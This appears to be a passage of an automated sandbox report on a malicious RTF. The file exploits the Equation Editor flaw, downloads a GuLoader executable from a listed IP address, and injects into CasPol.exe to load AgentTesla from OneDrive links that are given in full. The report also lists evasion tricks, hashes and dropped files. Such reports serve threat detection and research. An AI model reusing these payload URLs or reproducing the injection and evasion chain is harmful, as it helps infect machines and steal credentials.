Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 2660	Thread sleep time: -300000s >= -30000s

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 9_2_0056C015 rdtsc

Source: C:\Users\Public\vbc.exe	Code function: 3_2_00406873 FindFirstFileW,FindClose,
Source: C:\Users\Public\vbc.exe	Code function: 3_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\Public\vbc.exe	Code function: 3_2_0040290B FindFirstFileW,

Source: C:\Users\user\AppData\Local\Temp\Acly3.exe

System information queried: ModuleInformation

Source: CasPol.exe, 00000009.00000002.680256332.00000000008D0000.00000004.00000020.sdmp	Binary or memory string: VMware_S
Source: CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=\misv.exehttps://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21129&authkey=AC3Dy6XZGk4Lcrchttps://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21130&authkey=AF6g200UHTiCgqA
Source: CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Thread information set: HideFromDebugger
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Thread information set: HideFromDebugger

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 9_2_0056C015 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00570CCB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00570114 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00567A91 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_00572332 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 9_2_0056B7B6 mov eax, dword ptr fs:[00000030h]

HIPS / PFW / Operating System Protection Evasion:

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Local\Temp\Acly3.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 560000

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\Acly3.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
Source: C:\Users\user\AppData\Local\Temp\Acly3.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\user\AppData\Local\Temp\Acly3.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Users\user\AppData\Roaming\misv.exe "C:\Users\user\AppData\Roaming\misv.exe"

Source: CasPol.exe, 00000009.00000002.680891586.0000000000F50000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: CasPol.exe, 00000009.00000002.680891586.0000000000F50000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: CasPol.exe, 00000009.00000002.680891586.0000000000F50000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\Public\vbc.exe

Stealing of Sensitive Information:

Yara detected AgentTesla

Show sources

Source: Yara match

File source: 00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp, type: MEMORY

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Source: Yara match

File source: 00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected AgentTesla

Show sources

Source: Yara match

File source: 00000009.00000002.690406382.000000001E5B1000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution13	Path Interception	Access Token Manipulation1	Masquerading111	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection112	Modify Registry1	LSASS Memory	Security Software Discovery411	Remote Desktop Protocol	Clipboard Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion21	Security Account Manager	Virtualization/Sandbox Evasion21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Access Token Manipulation1	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol122	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection112	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information1	Cached Domain Credentials	File and Directory Discovery2	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery5	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
T81Ip9NCGi.rtf	36%	ReversingLabs	Document-RTF.Trojan.Heuristic
T81Ip9NCGi.rtf	100%	Avira	HEUR/Rtf.Malformed

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F8012674-B7CB-458D-8650-A31E79A66D61}.tmp	100%	Avira	EXP/CVE-2017-11882.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F8012674-B7CB-458D-8650-A31E79A66D61}.tmp	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\misv.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	20%	ReversingLabs	Win32.Downloader.GuLoader
C:\Users\Public\vbc.exe	20%	ReversingLabs	Win32.Downloader.GuLoader

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://scas.openformatrg/drawml/2006/main	0%	Avira URL Cloud	safe
http://192.3.122.180/1100/vbc.exe	100%	Avira URL Cloud	malware
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://schemas.openformatrg/package/2006/content-t	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://schemas.open	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://schemas.openformatrg/package/2006/r	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
onedrive.live.com	unknown	unknown	false	high
eruitg.bl.files.1drv.com	unknown	unknown	false	high
fspzka.bl.files.1drv.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://192.3.122.180/1100/vbc.exe	true	Avira URL Cloud: malware	unknown
https://onedrive.live.com/download?cid=5A15FDA1AE9	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmp	false		high
https://fspzka.bl.files.1drv.com/	CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmp	false		high
http://scas.openformatrg/drawml/2006/main	WINWORD.EXE, 00000000.00000002.566986051.00000000077FE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://investor.msn.com	CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmp	false		high
http://crl.entrust.net/server1.crl0	CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp, CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmp	false		high
http://ocsp.entrust.net03	CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp, CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
http://schemas.openformatrg/package/2006/content-t	WINWORD.EXE, 00000000.00000002.566916731.00000000077CE000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://fspzka.bl.files.1drv.com/y4mP7_EzD4E9pJoVHXNCm_aHG9sNUYaYn5ZLxRh4dzJ2jsCGVhpiD6B5BkejNSybMdS	CasPol.exe, 00000009.00000002.684034086.000000001D41E000.00000004.00000001.sdmp	false		high
https://fspzka.bl.files.1drv.com/y4mA4TmJkclcR_hxludBD4dX7tD1sUxzesfsAA1g8l7yxjN7FTtZtQscxnySO3fUefx	CasPol.exe, 00000009.00000002.684034086.000000001D41E000.00000004.00000001.sdmp, CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
https://fspzka.bl.files.1drv.com/lU)	CasPol.exe, 00000009.00000002.680300539.0000000000957000.00000004.00000020.sdmp	false		high
http://www.diginotar.nl/cps/pkioverheid0	CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	vbc.exe, 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000003.00000000.411004691.000000000040A000.00000008.00020000.sdmp, misv.exe, 0000000C.00000000.670443220.000000000040A000.00000008.00020000.sdmp, vbc.exe.1.dr, vbc[1].exe.1.dr, misv.exe.9.dr	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmp	false		high
https://eruitg.bl.files.1drv.com/	CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmp	false		high
http://schemas.open	WINWORD.EXE, 00000000.00000002.567007922.000000000782E000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.566916731.00000000077CE000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21129&authkey=AC3Dy6X	CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmp	false		high
https://onedrive.live.com/	CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmp	false		high
https://onedrive.live.com/download?cid=5A15FDA1AE98540B&resid=5A15FDA1AE98540B%21130&authkey=AF6g200	CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmp, CasPol.exe, 00000009.00000002.680070003.0000000000884000.00000004.00000020.sdmp, CasPol.exe, 00000009.00000002.679794080.0000000000190000.00000004.00000001.sdmp	false		high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	Acly3.exe, 00000004.00000002.684268580.0000000003D47000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.690242514.000000001E3B7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://schemas.openformatrg/package/2006/r	WINWORD.EXE, 00000000.00000002.567007922.000000000782E000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	WINWORD.EXE, 00000000.00000002.563683777.00000000042A0000.00000002.00020000.sdmp, vbc.exe, 00000003.00000002.416972078.0000000001F10000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.684104309.000000001D800000.00000002.00020000.sdmp	false		high
http://investor.msn.com/	CasPol.exe, 00000009.00000002.687534947.000000001E1D0000.00000002.00020000.sdmp	false		high
http://www.%s.comPA	WINWORD.EXE, 00000000.00000002.563683777.00000000042A0000.00000002.00020000.sdmp, vbc.exe, 00000003.00000002.416972078.0000000001F10000.00000002.00020000.sdmp, CasPol.exe, 00000009.00000002.684104309.000000001D800000.00000002.00020000.sdmp	false	URL Reputation: safe	low
https://eruitg.bl.files.1drv.com/y4muNEzpitWvAmX7Vz4E733dpYGfCYrMWu-PvveEpyz1hNKqOgAXlUDzjcpY7W274Qg	CasPol.exe, 00000009.00000002.683974678.000000001D390000.00000004.00000001.sdmp	false		high
http://ocsp.entrust.net0D	CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	false	URL Reputation: safe	unknown
https://secure.comodo.com/CPS0	CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	false		high
http://crl.entrust.net/2048ca.crl0	CasPol.exe, 00000009.00000002.680271787.000000000091A000.00000004.00000020.sdmp	false		high
https://onedrive.live.com/w	CasPol.exe, 00000009.00000002.680232197.000000000089E000.00000004.00000020.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.3.122.180	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	532227
Start date:	01.12.2021
Start time:	20:57:06
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 37s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	T81Ip9NCGi (renamed file extension from none to rtf)
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winRTF@14/13@3/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 97.1%) Quality average: 84.4% Quality standard deviation: 23.8%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 13.107.43.13, 13.107.43.12 Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, odc-web-geo.onedrive.akadns.net, bl-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, odc-bl-files-brs.onedrive.akadns.net, l-0003.dc-msedge.net, odc-bl-files-geo.onedrive.akadns.net, l-0004.dc-msedge.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/532227/sample/T81Ip9NCGi.rtf

Simulations

Behavior and APIs

Time	Type	Description
20:57:18	API Interceptor	51x Sleep call for process: EQNEDT32.EXE modified
20:58:28	API Interceptor	213x Sleep call for process: Acly3.exe modified
20:59:17	API Interceptor	64x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
192.3.122.180	QEw7lxB2iE.rtf	Get hash	malicious	Browse	192.3.122.180/2200/vbc.exe
	RFQ with Specification (Fitch Solutions).docx	Get hash	malicious	Browse	192.3.122.180/1100/vbc.exe
	3wdkxO3rGv.rtf	Get hash	malicious	Browse	192.3.122.180/55667/vbc.exe
	zoe3408r0Z.docx	Get hash	malicious	Browse	192.3.122.180/3222/vbc.exe

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	QEw7lxB2iE.rtf	Get hash	malicious	Browse	192.3.122.180
	REMITTANCE ADVICE.xlsx	Get hash	malicious	Browse	23.94.174.144
	P.O SPECIFICATION.xlsx	Get hash	malicious	Browse	198.23.251.13
	PO6738H.xlsx	Get hash	malicious	Browse	198.23.251.13
	VM845.html	Get hash	malicious	Browse	192.3.157.18
	dJN1gSSJv5.exe	Get hash	malicious	Browse	107.172.73.191
	REMITTANCE ADVICE.xlsx	Get hash	malicious	Browse	23.94.174.144
	Payment Advice.xlsx	Get hash	malicious	Browse	192.3.110.203
	RFQ No. 109050.xlsx	Get hash	malicious	Browse	23.94.174.144
	INV-088002904SINO.xlsx	Get hash	malicious	Browse	107.172.76.210
	quotation-linde-tunisia-plc-december-2021.xlsx	Get hash	malicious	Browse	107.173.191.75
	RFQ with Specification (Fitch Solutions).docx	Get hash	malicious	Browse	192.3.122.180
	VALVE.exe	Get hash	malicious	Browse	23.94.54.224
	Quotation - Linde Tunisia PLC..xlsx	Get hash	malicious	Browse	107.173.191.75
	Quotation 2200.xlsx	Get hash	malicious	Browse	107.173.143.36
	DAEFWjToGE.exe	Get hash	malicious	Browse	198.23.172.50
	V2N1M2_P.VBS	Get hash	malicious	Browse	192.3.121.222
	SHIPPING DOCUMENT.xlsx	Get hash	malicious	Browse	23.94.174.144
	REMITTANCE ADVICE.xlsx	Get hash	malicious	Browse	23.94.174.144
	SOA SIL TL382920.xlsx	Get hash	malicious	Browse	192.3.121.173

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Roaming\misv.exe	QEw7lxB2iE.rtf	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\misv.exe	sKxsGhU1Wg.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\Acly3.exe	QEw7lxB2iE.rtf	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\Acly3.exe	sKxsGhU1Wg.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	QEw7lxB2iE.rtf	Get hash	malicious	Browse
C:\Users\Public\vbc.exe	QEw7lxB2iE.rtf	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	downloaded
Size (bytes):	131595
Entropy (8bit):	7.073841941088541
Encrypted:	false
SSDEEP:	3072:gbG7N2kDTHUpou4ub+HbksLwq6cttYgSj+LaQitS42:gbE/HUjwkshtOlj+LaQitE
MD5:	99BDB5995C8DD619A3EC2B799D1CF868
SHA1:	7EB9E30BA8572F07A1E88972AD8F14954E84EB39
SHA-256:	C6F93EB69924750ADBE61115B2D6A200D534E783C6BD4CA0E2C0CD2969E9469E
SHA-512:	8A2817D4CD4D9584C0C723CA96550B65F530C6DE6193B977239CE3C90C8EB0E3942B7ECF2AC3F12C730AE053C3A88993D54BFED16FEE6B2CC5AA5083105C52D6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 20%
Joe Sandbox View:	Filename: QEw7lxB2iE.rtf, Detection: malicious, Browse
Reputation:	low
IE Cache URL:	http://192.3.122.180/1100/vbc.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j..........-5............@.......................................@..........................................................................................................................................................text....h.......j.................. ..`.rdata...............n..............@..@.data...............................@....ndata...`...`...........................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F8012674-B7CB-458D-8650-A31E79A66D61}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	3.9382976026552097
Encrypted:	false
SSDEEP:	48:ruLgOdZw1wQ5l/8bc3ABCOktG0/RIoj+WRdpzH:2BZmwQ5l/n3ABJf0J5jRRP
MD5:	CDAED283D66EF69103EAB36E7A087231
SHA1:	DE3A1270341A60F1BCF6657155E470DAE1505473
SHA-256:	C7D64784E1C35D116D0C123DECC90931F1B077829C15DF31C5FA9B4A7221AE47
SHA-512:	9A3F49CD4CDE57113A5616B12F8C244FD772C5AC600FA3931E7488E7176FB3FB24D279F708B246D62DFF7F9E33B304CE15C0649A8277666FB903BD8CEA9A506D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AAA38BD7-6E2E-4485-B33A-19C659167A7E}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F0D5BFD7-E4B2-42A8-9D9F-4F62C3EB8116}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	3774
Entropy (8bit):	3.5540606276661406
Encrypted:	false
SSDEEP:	96:qUNznlUendEJjgCjk6/AT/xe6GpzSsP8XuSo:vNLlU3N4qAdelpI+
MD5:	1F3897864361C0D07786091F3C2CA1B9
SHA1:	45E2127F9AECB43545DEBEF1B7ADCF4E75603650
SHA-256:	BF5AD13992235C123456E15FAF52BD54F6DB416A277A5D9109F1174C74BF6F17
SHA-512:	39A8C13353340CF55881A028AB783F4482E056B71E20C7821F4986C6BF7262A28B3AEA05493B1063A2FF91F2DD7CDDD48CE69BE274EACC131724804CC0998380
Malicious:	false
Preview:	\|.!.`.=._.-.^.;...<.?..?.^.?.!.^.!.%...%._...?.5.7.#.~.:.7.@.9.:.[.:.6.~.?.%.@...<...2._.=.!.!.!.4.,.9.?.?.].%.?.%.].[.+._.3.9..9.~.&.%.3.=.?.0.#.4.2.>.>.\|.;.~.1.).@.;.5.4.@.?.)./.?.,.?.7.;.5.?.%.?.6.7.7.)...^.9._.?.\|.9.3.4.~.\|.,.&.2.8._.5.?.3./.2.+.4...%.%.0.?.`.^.(.3.].?.%.~.)...1.2.!./.#..~.%.?...].\|...>.+.7.-._.-.@.@.2.?..<.&.).>.@.;.:.].>.$.?.[...?._.!.\|.&.%.=.8.<.&.2.`.4.%.!._..~...~.8.'.%.+.%.1.>.?.%.]...'....7.$.'.4...\|.'.,.9.~.'.=.7.!.!.4.7.../.?.?.;.9.:.,.:.#.?.%...<.[.8.'./.7...-.&.%.&.1.#...&.;.].6.+.%.].=.?.)..0.-.4.\|.-.^._.3._.5...?.%.$.-.+.\|.^.9...7.#.@.~.&.3.!.!...%.\|...;.2.>.2.....].=...6.8.).6.2.3.~.+.[.#.?...=.#.@.?.....@.#...;.2.?.:.`...!.....(.?.+.2.@.?.[.+..9..9.&.3.?.&.?...'._.;...<.5.!.(...=.1.1.2.~.3.1.>.1.!.+.%.~.1.&.,.3.!.?.].,.%.>.(.5.$.^.\|.<.~.?.,.?.%.;.;.'.`.@.7..[.?.'.3._.~.;.'.+.=.2._.1.&.<.'.(.5.(.2.+.,...].'.2.!.0.+.-.1.+.?.8...?.\|.0.!....3.?.<.!.?.;.:.?..&.-.$.'.?.3.].;.!.%.5.=./.$.;./.?.%.+.=.$.=.\|.%.>.[.&.'...~.!.8.%.3.'.^...&.>.?.8.).$.

C:\Users\user\AppData\Local\Temp\Acly3.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21304624
Entropy (8bit):	0.09518636040127255
Encrypted:	false
SSDEEP:	1536:j30RIkuZxe033g6Oixa+IC8KNXA/wMy2dWVu2h55nw6+717EQZ4yr3hShX:j30qHZxT3gsxaZmNXYy7zysx
MD5:	E32061DA9B34B82E0AB5D0E53CAF5A09
SHA1:	5AABAD649F6C4B826C30BDF8152E6F8D33CB8133
SHA-256:	7C9AEB4763912BE27C0B5CFE843642E4424902DD2EEFB1AD2DF6092EBF10A468
SHA-512:	EBF93E81A0AB530EA19131F490A2423E017384357731FBE5CAC4D60876C5B535E371BB9443D62AEA8F41D732079EAB2A6EDD4335EDEAAD086EED2410D5914F54
Malicious:	true
Joe Sandbox View:	Filename: QEw7lxB2iE.rtf, Detection: malicious, Browse Filename: sKxsGhU1Wg.exe, Detection: malicious, Browse
